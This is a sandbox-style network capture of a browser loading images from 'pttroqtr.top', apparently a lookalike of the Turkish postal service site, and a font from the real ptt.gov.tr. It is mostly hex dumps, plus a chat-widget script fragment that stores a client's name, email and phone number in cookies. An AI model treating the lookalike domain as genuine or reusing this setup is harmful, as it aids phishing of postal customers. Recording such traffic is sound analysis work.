                                                                                                                                                                                            2024-09-28 03:39:39 UTC1390INData Raw: 65 6e 74 5f 6e 61 6d 65 3a 61 6c 6f 54 65 63 68 47 65 74 43 6f 6f 6b 69 65 28 22 63 6c 69 65 6e 74 5f 6e 61 6d 65 22 2c 65 2e 61 6c 6f 74 65 63 68 5f 64 61 74 61 2e 68 6f 73 74 6e 61 6d 65 29 2c 63 6c 69 65 6e 74 5f 65 6d 61 69 6c 3a 61 6c 6f 54 65 63 68 47 65 74 43 6f 6f 6b 69 65 28 22 63 6c 69 65 6e 74 5f 65 6d 61 69 6c 22 2c 65 2e 61 6c 6f 74 65 63 68 5f 64 61 74 61 2e 68 6f 73 74 6e 61 6d 65 29 2c 70 68 6f 6e 65 5f 6e 75 6d 62 65 72 3a 61 6c 6f 54 65 63 68 47 65 74 43 6f 6f 6b 69 65 28 22 70 68 6f 6e 65 5f 6e 75 6d 62 65 72 22 2c 65 2e 61 6c 6f 74 65 63 68 5f 64 61 74 61 2e 68 6f 73 74 6e 61 6d 65 29 7d 29 2c 22 63 75 73 74 6f 6d 65 72 5f 68 69 73 74 6f 72 79 22 69 6e 20 41 6c 6f 43 68 61 74 2e 70 61 72 61 6d 73 26 26 41 6c 6f 43 68 61 74 2e 70 61 72
                                                                                                                                                                                            Data Ascii: ent_name:aloTechGetCookie("client_name",e.alotech_data.hostname),client_email:aloTechGetCookie("client_email",e.alotech_data.hostname),phone_number:aloTechGetCookie("phone_number",e.alotech_data.hostname)}),"customer_history"in AloChat.params&&AloChat.par
                                                                                                                                                                                            2024-09-28 03:39:39 UTC1390INData Raw: 6c 6c 28 22 2e 61 6c 6f 74 65 63 68 2d 63 68 61 74 2d 62 6f 64 79 22 29 2c 6e 3d 30 3b 6e 3c 69 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 5b 6e 5d 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 69 66 72 61 6d 65 22 29 26 26 76 6f 69 64 20 30 3d 3d 3d 68 26 26 28 68 3d 69 5b 6e 5d 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 69 66 72 61 6d 65 22 29 29 3b 76 61 72 20 6c 2c 63 3d 22 22 3b 66 6f 72 28 6c 20 69 6e 20 65 2e 61 6c 6f 74 65 63 68 5f 64 61 74 61 29 61 6c 6f 54 65 63 68 53 65 74 43 6f 6f 6b 69 65 28 6c 2c 65 2e 61 6c 6f 74 65 63 68 5f 64 61 74 61 5b 6c 5d 2c 22 63 6c 69 65 6e 74 5f 6e 61 6d 65 22 3d 3d 3d 6c 7c 7c 22 63 6c 69 65 6e 74 5f 65 6d 61 69 6c 22 3d 3d 3d 6c 7c 7c 22 70 68 6f 6e 65 5f 6e 75 6d 62 65 72 22 3d 3d 3d 6c 3f 37 33 30 3a 31 2c
                                                                                                                                                                                            Data Ascii: ll(".alotech-chat-body"),n=0;n<i.length;n++)i[n].querySelector("iframe")&&void 0===h&&(h=i[n].querySelector("iframe"));var l,c="";for(l in e.alotech_data)aloTechSetCookie(l,e.alotech_data[l],"client_name"===l||"client_email"===l||"phone_number"===l?730:1,


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            115192.168.2.5498418.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:39 UTC361OUTGET /help/layout/images/52.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:39 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:39 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 21895
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"5587-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:39 UTC16073INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 55 14 49 44 41 54 78 da ec bd 4f 8f 23 49 17 af 15 33 8c 90 90 90 aa 5e 84 e6 22 dd 45 e5 88 0d 42 88 f2 a0 17 b1 01 55 f6 f2 02 9a 72 4b 17 84 10 52 65 6f d8 a1 76 8b 2d a2 5c 9f a0 dd ba 1f a0 b3 24 16 77 37 ee 61 81 58 b5 6b 07 d2 48 e3 e2 0b 8c 6b c1 82 77 33 2e 56 2c 40 8d 4f f5 89 f6 a9 a8 c8 7f 76 da 4e db cf 23 a5 aa db 7f d2 99 91 11 27 7e 71 e2 c4 89 ef be 7c f9 e2 00 00 00 00 60 bf f8 9e 22 00 00 00 00 40 c4 01 00 00 00 00 22 0e 00 00 00 00 10 71 00 00 00 00 88 38 00 00
                                                                                                                                                                                            Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<UIDATxO#I3^"EBUrKReov-\$w7aXkHkw3.V,@OvN#'~q|`"@"q8
                                                                                                                                                                                            2024-09-28 03:39:39 UTC5822INData Raw: 5b 23 d7 6f d2 81 69 7a 98 eb c8 5b 4f fb 13 b7 19 db 24 ed 4a db e8 3e a4 3f 28 eb 5c 53 b7 da 74 5d 5a 47 24 76 d8 6e e4 ae 38 0e ee b6 66 de bf b1 8b ef ec d0 5b e1 9a 8a 52 4e 74 d1 7e 27 25 e5 d1 04 11 d1 1f 4b de 3f 44 11 57 e5 0c b8 0b a6 4b fd f3 bf ad 5a c4 b0 0f 1c d2 74 ea cc 7d 4d b8 3a 2d d9 b9 61 a2 22 6d a0 d3 7a 92 35 fb 67 f7 d5 63 24 ab e4 06 7e 3a 4b 83 d1 63 31 76 d7 1b de dd 61 d7 23 e9 98 80 13 a1 f6 da 18 61 bf 91 b5 f7 b2 f5 75 91 c6 a4 ec dc 5a 6e 33 15 71 d9 21 ac 48 6d 39 36 ec 7e 03 d7 97 b9 66 0b 1a 62 9d c2 3a 23 e0 55 0c f2 e3 0e 9f 67 5a 47 b8 55 0c 56 fa 2b fc 6e 12 b4 bb 7d 9b d6 ad 8a 83 ab eb f1 18 17 3c ff f3 15 da 5a ec 37 3f 6d 30 9c 63 9d f6 1b 13 71 f7 4d e3 86 55 ac 3c ac 20 16 f7 92 9a b9 e1 72 f3 79 3b 48 3c 88
                                                                                                                                                                                            Data Ascii: [#oiz[O$J>?(\St]ZG$vn8f[RNt~'%K?DWKZt}M:-a"mz5gc$~:Kc1va#auZn3q!Hm96~fb:#UgZGUV+n}<Z7?m0cqMU< ry;H<


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            116192.168.2.5498438.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:39 UTC361OUTGET /help/layout/images/53.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:39 UTC312INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:39 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 68155
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"10a3b-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:39 UTC16072INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 01 09 c8 49 44 41 54 78 da ec 9d 07 80 14 e5 d9 c7 9f 77 66 eb f5 e3 38 38 40 8a 14 1b 16 9a 15 63 c5 8a d8 7b fd 6c 88 dd a8 51 a3 18 4d 62 4c 34 cd 98 68 2c 31 2a 2a b6 28 16 ec 1a 13 2b 2a 08 08 0a 48 87 a3 1c 70 c7 f5 db db 9d 79 df ef ad 33 ef ec 1d 2a 24 c4 c2 f3 4b d6 6d b3 b3 b3 b3 b3 37 7f fe 4f 23 8c 31 40 10 04 41 10 04 41 be 5f 38 b8 0b 10 04 41 10 04 41 50 c4 21 08 82 20 08 82 20 28 e2 10 04 41 10 04 41 10 14 71 08 82 20 08 82 20 28 e2 10 04 41 10 04 41 10 14 71 08 82 20
                                                                                                                                                                                            Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<IDATxwf88@c{lQMbL4h,1**(+*Hpy3*$Km7O#1@AA_8AAP! (AAq (AAq
                                                                                                                                                                                            2024-09-28 03:39:40 UTC16384INData Raw: 30 b4 be f7 6f 7b 5c 97 54 7d 57 fd e4 da e3 fb f5 e9 33 e8 81 09 13 0a f1 cf 20 82 20 08 8a b8 ef 05 27 9c 78 a2 48 12 3a 9c 84 89 46 f0 ec e4 37 61 e6 cc 39 e0 26 12 50 dc 67 7b a0 a2 12 d3 d1 ad 63 1d ad 9d 40 b9 42 54 38 47 f2 e4 ed 80 ca eb 57 d5 99 a2 82 55 06 3a b9 a8 72 fb 6e 0b 7d 4f b9 50 b5 79 e0 27 d8 b5 5c c8 65 b3 ad 5c 98 a4 20 16 17 e3 bb 52 c0 b8 98 a3 5c d8 c9 6a 57 d1 96 44 3b 79 42 c4 f9 5c e4 b5 27 92 f0 c0 be a7 c2 e2 5e 7d a4 20 68 99 bf 14 6a df 9d a2 26 1f 80 5d ed 18 86 e7 c4 c9 bc 69 ce 97 b0 fa d5 f7 a0 79 c9 2a 20 a9 04 24 87 0f 82 6e d7 5f 08 fd 5f 9e 04 dd 7f 71 0b 7f 2c d5 51 60 fd 2f d0 22 a2 f5 dd b7 60 d5 59 27 42 d3 df 9f d2 9a 89 41 ae ad 09 72 f5 eb c1 6b 6e 95 ed 55 88 9c da e0 f0 ef 23 09 31 be bd 6e 32 16 c8 68 f5
                                                                                                                                                                                            Data Ascii: 0o{\T}W3 'xH:F7a9&Pg{c@BT8GWU:rn}OPy'\e\ R\jWD;yB\'^} hj&]iy* $n__q,Q`/"`Y'BArknU#1n2h
                                                                                                                                                                                            2024-09-28 03:39:40 UTC16384INData Raw: 2e 81 27 5e de 9d f2 2f eb 76 d8 3e 3e b1 ef ad c4 b1 66 f6 46 52 9e 67 96 19 52 f3 a6 8c 76 cd bc 18 f9 22 03 7d 03 66 13 3d 6d 8f 9b 3d 2e 5b 47 35 81 ef 01 4a 35 fd 77 8c bb b6 30 a5 e6 b5 bd 75 1c 33 7f 26 e2 ca 9d 21 64 96 8b c5 a8 ce ac 96 a0 43 23 c8 50 d8 2a 54 b5 ad 08 47 91 68 de 56 c4 1b 12 07 88 ce 46 6c 91 34 78 45 ef 63 1d 52 1d da 1e 7b d6 13 23 42 05 98 53 a1 f4 01 bc c2 0e 24 b8 8c 7d 88 3f 4f f0 d7 35 1e df aa af c1 88 42 e9 b2 cb 02 90 68 cf 0f ef 08 05 c5 1f 1c 23 13 18 b0 ab d3 bc 72 d5 aa 82 d8 5b 09 e4 72 d0 ab 76 cd a9 fd f5 3d d9 31 1b 0c 7d 83 d1 25 73 d0 8d f7 d9 b1 ec 8b 93 63 a6 98 cf 69 ff 1e d3 e3 75 21 74 1f 2d 75 34 73 3f 67 4b 84 d9 fc 65 20 2e 18 7f 73 db 6d 7c c7 b6 6d 3b 19 e3 35 fc 7c b1 90 d3 0b 9d 00 4d 1d 2d f6 3b
                                                                                                                                                                                            Data Ascii: .'^/v>>fFRgRv"}f=m=.[G5J5w0u3&!dC#P*TGhVFl4xEcR{#BS$}?O5Bh#r[rv=1}%sciu!t-u4s?gKe .sm|m;5|M-;
                                                                                                                                                                                            2024-09-28 03:39:40 UTC16384INData Raw: 02 4c eb 39 d6 46 bc 56 41 ab 99 37 9c dc 00 61 5f 9c 63 df a8 7f 2d 78 1e 42 8f 3c 92 2a a3 5a 1b 11 ce 4d 99 d5 24 63 28 26 0e 99 ff fa bd 07 d2 37 04 a4 5c 80 da 23 9b db 58 b8 dc 89 2b a0 7c e9 eb 1d 86 93 5b ff e1 5d 77 8e bc f4 e2 8b db c5 e5 fc a2 78 6e ef 67 36 6d 4a b2 df 14 d9 c8 46 36 b2 31 bb 06 cd a6 00 e0 7f 6e ba 4d f6 fa 54 6e fd f3 5b 3f 8f d6 37 7e ee 79 e7 c2 c6 8d e7 43 b3 d9 f0 25 33 6e d9 0b ab 2a e5 81 19 b0 ea 84 63 9e 4c b3 06 be 92 e9 62 ce 4e 84 b9 cf bb 3e 38 fb bc d4 57 d8 e7 98 ed 95 33 29 10 d4 a7 13 94 ca 45 88 f3 91 d8 b7 16 d4 ea 75 68 34 9b 46 a5 1a eb de b8 c8 28 55 23 9b e2 a0 05 10 43 e5 e7 e1 dc 13 7e 07 06 4b f7 00 49 88 f6 10 63 86 c9 32 f7 c0 72 02 cb dd 03 b5 1d 1f 80 a4 f1 b4 e7 67 a6 7b a4 d9 32 09 3e 0b 05 65
                                                                                                                                                                                            Data Ascii: L9FVA7a_c-xB<*ZM$c(&7\#X+|[]wxng6mJF61nMTn[?7~yC%3n*cLbN>8W3)Euh4F(U#C~KIc2rg{2>e
                                                                                                                                                                                            2024-09-28 03:39:40 UTC2931INData Raw: 9b 77 ff f2 57 bf da d6 b6 ac 6d f7 40 21 bf 57 09 38 79 86 e5 46 c8 89 3d b3 67 ce e8 45 eb 14 00 00 00 44 1c f8 93 49 e7 72 4a fd d4 cb ad d9 a6 3e 1c 99 49 a5 a6 7e e1 aa cf bd f5 73 5f f8 fc ac 20 08 b8 b5 fe f5 da ac ae ac 56 a6 72 fe 09 2a f7 dc 42 51 a9 cd e4 5c f1 8c 14 41 81 16 68 bc 22 b7 81 90 58 c1 e4 95 9a 88 2f b3 8e 4e 9f 90 85 36 a5 c1 af ca 29 78 32 bd ca ac e1 af 1e b0 88 28 aa 1f 2a b7 09 52 40 35 50 b6 fe 8b 6a e4 53 8b 36 ae 9e 57 55 e2 28 4b 3c 18 41 fe a8 ab 28 95 a8 bc e8 25 62 99 0c 0d dc 7c 3b 51 5f de cc 5f 64 5d b0 7d 60 ae 93 09 9e 27 b9 1f af ad a5 e0 a8 19 94 3a 6a 26 51 5d 83 3c 36 4b 22 8c 8c 78 53 55 bb 6c 9a 82 91 c3 cd f1 83 d4 ae 7b 77 54 fb 74 ed da 35 07 2e ba f8 e2 55 2f 2d 5e bc 5d 3e 65 97 12 6d 91 a9 be 6d 96 cf
                                                                                                                                                                                            Data Ascii: wWm@!W8yF=gEDIrJ>I~s_ Vr*BQ\Ah"X/N6)x2(*R@5PjS6WU(K<A(%b|;Q__d]}`':j&Q]<6K"xSUl{wTt5.U/-^]>emm


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            117192.168.2.5498448.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:39 UTC361OUTGET /help/layout/images/54.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:40 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:39 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 62332
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"f37c-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:40 UTC16073INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 f3 09 49 44 41 54 78 da ec 7d 07 98 5b c5 d5 f6 51 97 56 5a 69 7b ef 5e af 7b c7 15 57 6c aa e9 10 20 a1 27 24 21 05 02 04 7e c2 47 42 49 e0 4b a3 a5 00 5f 1a 21 09 bd 84 de 12 c0 06 8c b1 8d 8d 0b d8 06 b7 ed bd 57 75 e9 9f 33 77 46 ba 2b ef 7a b5 5e 6d f1 fa bc cf 23 6b 35 be ba f7 6a e6 dc 99 77 4e d5 04 83 41 20 10 08 04 02 81 40 20 1c 5b d0 52 17 10 08 04 02 81 40 20 10 89 23 10 08 04 02 81 40 20 10 89 23 10 08 04 02 81 40 20 10 89 23 10 08 04 02 81 40 20 12 47 20 10 08 04 02
                                                                                                                                                                                            Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<IDATx}[QVZi{^{Wl '$!~GBIK_!Wu3wF+z^m#k5jwNA @ [R@ #@ #@ #@ G
                                                                                                                                                                                            2024-09-28 03:39:40 UTC16384INData Raw: 1c 09 ca 02 fb da fe 97 e0 b6 af fe a6 90 75 77 df e7 c1 ae 7f b4 6a 1b 3c dd 78 26 fc 72 d2 b7 78 db 59 13 cf e3 7d df 57 bf 07 06 e8 13 bc 2f 8b 90 c3 d4 b4 14 e8 c0 3c 62 3d 4e de 97 49 22 bf 1f a6 2d 29 2d af e4 fd 2e 4b a8 45 d3 d7 ea 8a 1a 69 29 29 5c ab 2c d3 9c 1c 0d 90 40 a1 8c e7 e6 64 73 92 e9 8f 22 60 05 89 27 46 ee ea 8d 71 50 34 51 f1 f1 74 88 df 15 dc fb 32 b8 df f9 09 04 42 9d 7d 78 7a 33 24 75 ee f5 ff 00 ed 8e 67 c0 74 ea af 40 37 e5 5c de 5e 5c 32 05 32 32 b3 a1 bd a5 11 0e ee ff 92 11 65 25 f5 08 56 e2 c8 48 4f 8f 5a fb 2d 2b 2c 0c 57 0d 5d af cf 0b 58 ce 2f 56 cf 86 94 27 94 e5 c9 93 26 a6 99 cd e6 1c 46 e2 36 43 ef a0 2e 89 6b c4 3b 92 b7 c5 5c 6b 7c f0 20 bc bf ee 7d de 88 e9 49 fa 94 71 46 ea 3e d9 bc 09 be d8 b3 1b 4e 5a 75 12 4c
                                                                                                                                                                                            Data Ascii: uwj<x&rxY}W/<b=NI"-)-.KEi))\,@ds"`'FqP4Qt2B}xz3$ugt@7\^\222e%VHOZ-+,W]X/V'&F6C.k;\k| }IqF>NZuL
                                                                                                                                                                                            2024-09-28 03:39:40 UTC16384INData Raw: 89 30 79 3d 7c b4 18 1c 84 e4 0a d2 a5 2c 0c df ee 20 09 ac d8 3c 43 98 ee a9 a8 ac a4 ed 5e af 65 f5 9b 35 84 88 8f 1c 3d 1e 72 c8 64 11 6d 2e ce 65 fd da 35 b0 3d ff e4 8a 4f 14 89 0b 22 69 01 f7 ad 5d bd 7a cb a5 97 5d f6 a8 c7 ef df 83 7c 8e 6c 34 58 50 92 37 49 e2 4e 56 32 47 7b 84 d8 e4 07 4c 7c a0 1d f9 cf 6f 85 50 d1 e1 41 7b 7d a8 f7 66 7b e9 bf 91 a4 05 04 0d e2 5e 83 41 dc 36 24 af 8c dc 99 cd 91 f8 2b ec 60 85 1e 59 65 55 15 38 1d 4e b0 58 cc 27 e4 8d c3 63 b6 92 41 cf d5 ea 82 a6 26 46 28 1a 1b 5a c8 2c 3c 8d 74 42 a7 43 ce d0 e8 f9 61 f2 c3 b5 1f ed 87 c2 a3 0d 83 d6 ee a8 f5 f6 e6 e5 63 e8 7b 65 e2 82 b0 3b 9f 38 b4 b1 7b bc 76 64 7c 23 4a f8 ba ba 2f f8 1d ac 45 c9 de ab a1 ae ae 1e dc 3e 1f b1 fb 19 90 96 1e 8d 51 c4 e4 87 5f 6e fc 15 ec
                                                                                                                                                                                            Data Ascii: 0y=|, <C^e5=rdm.e5=O"i]z]|l4XP7INV2G{L|oPA{}f{^A6$+`YeU8NX'cA&F(Z,<tBCac{e;8{vd|#J/E>Q_n
                                                                                                                                                                                            2024-09-28 03:39:40 UTC13491INData Raw: ff 6e 21 04 ee 20 44 25 56 d4 9c 80 84 62 08 5b 48 b1 c5 16 65 8f 25 74 21 05 a9 0b 0f 82 20 7e a5 60 b4 90 a7 31 fb fc 7e da ff 31 81 e4 a8 03 57 08 26 a3 90 f1 ba 0d 9b 40 ab d5 c0 59 67 ce 1a fe d5 f2 55 2e e5 6d 00 99 c0 20 21 21 d1 cf 90 89 0d 12 12 12 12 12 12 12 12 83 10 d2 13 27 21 31 08 a1 58 b6 a3 1e 31 2e 8a 2c bc 4c 08 2f 9f a4 89 84 0f 9f f2 f3 31 af b1 fb 3b 5a 12 1c 30 72 2b c7 01 e5 52 70 5d 4e 66 fa fc 79 3f bc e8 7c dc e1 71 7b 40 a5 52 87 b5 1a b5 4a ab d5 c2 d6 6d f9 54 77 a5 aa a6 c6 b3 71 d3 d6 9d 05 07 0e ac 33 9b cd db 21 ea ae f3 81 4c 60 90 90 90 18 00 90 31 71 12 12 27 11 14 09 1e 4a e1 62 15 b4 bf 34 7a ca c4 72 71 8d 3d 04 26 80 18 6c 26 73 de ec d9 33 2e a6 ec 2e 18 9a 73 f7 6f 7e 35 27 2b 2b 83 56 71 f8 f7 4b af 6e c4 fd 2f
                                                                                                                                                                                            Data Ascii: n! D%Vb[He%t! ~`1~1W&@YgU.m !!'!1X1.,L/1;Z0r+Rp]Nfy?|q{@RJmTwq3!L`1q'Jb4zrq=&l&s3..so~5'++VqKn/


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            118192.168.2.549847185.220.152.264432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:40 UTC621OUTGET /_next/static/media/OmnesRegular.2b095194.otf HTTP/1.1
                                                                                                                                                                                            Host: www.ptt.gov.tr
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            Origin: https://www.ptt.gov.tr
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: font
                                                                                                                                                                                            Referer: https://www.ptt.gov.tr/_next/static/css/fdc30eafd5b8da2a.css
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:40 UTC372INHTTP/1.1 200 OK
                                                                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                                                                            Keep-Alive: timeout=5
                                                                                                                                                                                            Content-Type: font/otf
                                                                                                                                                                                            Last-Modified: Thu, 12 Sep 2024 09:54:30 GMT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            ETag: W/"1b394-191e5a7dff0"
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:40 GMT
                                                                                                                                                                                            Content-Length: 111508
                                                                                                                                                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
                                                                                                                                                                                            2024-09-28 03:39:40 UTC6899INData Raw: 4f 54 54 4f 00 0d 00 80 00 03 00 50 43 46 46 20 18 40 75 bf 00 00 08 f0 00 00 89 ed 44 53 49 47 00 00 00 01 00 01 ac 80 00 00 00 08 47 44 45 46 07 ca 07 c2 00 00 92 e0 00 00 00 3a 47 50 4f 53 dc db 63 5a 00 00 93 1c 00 00 ea 9e 47 53 55 42 b2 5f 57 ea 00 01 7d bc 00 00 25 3e 4f 53 2f 32 63 7b 6b c1 00 00 08 64 00 00 00 60 63 6d 61 70 81 aa 9e 48 00 01 ac 88 00 00 07 0c 68 65 61 64 10 a4 3f 1a 00 00 00 dc 00 00 00 36 68 68 65 61 07 60 04 c7 00 00 08 c4 00 00 00 24 68 6d 74 78 68 11 46 ac 00 01 a2 fc 00 00 09 64 6d 61 78 70 02 59 50 00 00 00 08 e8 00 00 00 06 6e 61 6d 65 58 3b 39 69 00 00 01 14 00 00 07 50 70 6f 73 74 ff c2 00 46 00 01 ac 60 00 00 00 20 00 01 00 00 00 01 01 06 ee e2 ea 64 5f 0f 3c f5 00 03 03 e8 00 00 00 00 d6 eb 06 5f 00 00 00 00 d6 fa f3
                                                                                                                                                                                            Data Ascii: OTTOPCFF @uDSIGGDEF:GPOScZGSUB_W}%>OS/2c{kd`cmapHhead?6hhea`$hmtxhFdmaxpYPnameX;9iPpostF` d_<_
                                                                                                                                                                                            2024-09-28 03:39:40 UTC7271INData Raw: 08 0b 15 fb 26 ed 26 f7 25 d5 c2 a4 a5 a9 1e a5 a0 97 a2 9a 1a ab 66 93 87 89 1e 5d 73 61 61 32 1b 2b 46 cb eb 82 1f 8a 90 8b 90 8f 1a f7 fd 06 9d 92 91 9c 1f 92 07 f7 21 35 e9 fb 19 fb 1d 28 20 fb 25 1e f8 14 b2 15 fb cd 06 6f 1d e2 1b e2 c4 4d 2e 8f 1f 0b 15 82 06 79 a8 1d fb bd 07 51 71 57 64 46 1b 3a 5e c4 e7 1f f7 89 07 a5 3f 0a a8 1d fb 8e 07 fb 0f c7 36 f7 0f d8 c2 b3 c0 ab 1e 7e 8c 7e 8c 7e 1e 66 8f 9d 81 9f 1b 99 97 91 8d 1f f8 4f 74 0a 0e 15 fb 26 ed 26 f7 25 d5 c1 a4 a5 aa 1e a4 a0 98 a2 9a 1a ab 66 93 87 89 1e 5d 73 61 61 32 1b 2b 46 cb eb 82 1f 90 8a 37 0a 15 f7 2c e3 c1 e4 d8 42 ac 45 9d 1f 3c 9f 5c 8f 89 ac 8a 95 8d 94 94 92 08 8a 94 93 8b 94 1b f7 05 dc d5 ec b4 7a b0 72 a7 1f d8 de 8d 90 7e a3 74 8d 19 7a 8d 7c 85 7d 73 67 57 18 a1 6b 63
                                                                                                                                                                                            Data Ascii: &&%f]saa2+F!5( %oM.yQqWdF:^?6~~~fOt&&%f]saa2+F7,BE<\zr~tz|}sgWkc
